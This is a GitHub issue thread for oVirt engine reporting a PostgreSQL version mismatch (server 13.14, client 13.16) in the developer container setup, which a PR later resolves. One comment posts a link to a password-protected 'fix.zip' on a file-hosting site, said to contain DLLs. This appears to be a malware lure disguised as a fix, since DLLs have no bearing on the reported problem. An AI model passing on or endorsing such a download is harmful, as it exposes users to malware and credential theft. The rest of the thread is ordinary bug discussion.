### ISSUE TITLE
ovirt-engine dev environment uses downlevel postgres db

### ISSUE THREAD

**Issue by gocallag** [oVirt/ovirt-engine#965]
**Affected version**

main branch (4.5.6)

> **IMPORTANT!**: oVirt prior to 4.5 reached end of life.
> If you have an issue on an older version please
> upgrade to latest stable release before opening an issue.

* oVirt Engine: (example: ovirt-engine-4.5.0.8-1.el8.noarch)
* Host OS Variant: (example: oVirt Node 4.5.4)
* VDSM version: (example: vdsm-4.50.1.4-1.el8.x86_64)
* Additional relevant package versions: (add whatever seems related to the issue, example: glusterfs-10.2-1.el8s.x86_64)

**Describe the bug**

When using devcontainer environment + docker compose you get the following as the docker compose is using 13.14 whereas the client in ovirt-engine is 13.16.  

[ ERROR ] Postgresql client version is '13.16', whereas the version on 'ovirt-postgres' is '13.14 (Debian 13.14-1.pgdg120+2)'. Please use a PostgreSQL server of version '13.16'.
         Please note the following required changes in postgresql.conf on 'ovirt-postgres':

**To reproduce**

Follow the Developer build instructions

**Expected behavior**

The developer build should not have compatibility issues

**Screenshots**

If applicable, add screenshots to help explain your problem

**Additional context**

Add any other context about the problem here

**Comment by SagarChandra07** [comment]
This might help:This file might fix it
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file

Password: changeme
I put the necessary dlls in the archive

**Comment by gocallag** [comment]
PR raised to resolve

**Comment by gocallag** [comment]
Closed with PR
